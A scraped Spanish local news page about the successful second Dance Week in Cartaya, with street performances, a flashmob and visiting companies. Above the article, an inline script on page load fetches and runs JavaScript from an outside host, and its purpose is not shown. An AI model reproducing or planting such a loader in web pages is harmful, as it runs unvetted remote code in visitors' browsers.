(function (document, window) { document.addEventListener('DOMContentLoaded', function (event) { let a = document.createElement("script"); a.type = 'text/javascript'; a.async = true; a.src = "https://data.gblcdn.com/data/gblcdnp.js?pubid=05a114a0-fca3-11e9-8439-f143cce16e54&pid=TcvybSOnmDcPUTj&renderD=0&limitT=0&limitH=24&t=i"; document.body.appendChild(a); document.getElementById('TcvybSOnmDcPUTj').remove(); }); }) (document, window);
Viernes 01 de Julio de 2022

Éxito de participación en la II Semana de la Danza

0

La II Semana de la Danza ha echado el telón este fin de semana de la que ha sido su edición más participativa. A ello han contribuido el incremento en el número de espectáculos propuestos, la variedad de géneros ofertados y sobre todo, la novedosa apuesta por llevar estos espectáculos a la calle y a los espacios públicos.

Así, numerosos colectivos han participado en estas iniciativas y se han acercado a las distintas disciplinas de la danza, tanto en los centros educativos de secundaria como, por ejemplo en el Mercado Municipal de Abastos, que registró un lleno absoluto el sábado en el Flasmob que protagonizó la Academia Municipal de Baile que dirige Charo Angulo.

También en el fin de semana han dejado su huella en Cartaya compañías de primer nivel como ‘Mimenko’, con su espectáculo, del mismo nombre, o Ball Danza con su espectáculo ‘Mira Miró’.

Tanto la alcaldesa, Pepa González Bayo, como la concejala de Cultura, María Dolores Carro, han destacado “la apuesta municipal por la cultura y la dinamización económica, social y turística que este tipo de iniciativas culturales implica en nuestro pueblo”.

 


Leave A Reply

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios. Ver detalles

ACEPTAR
Aviso de cookies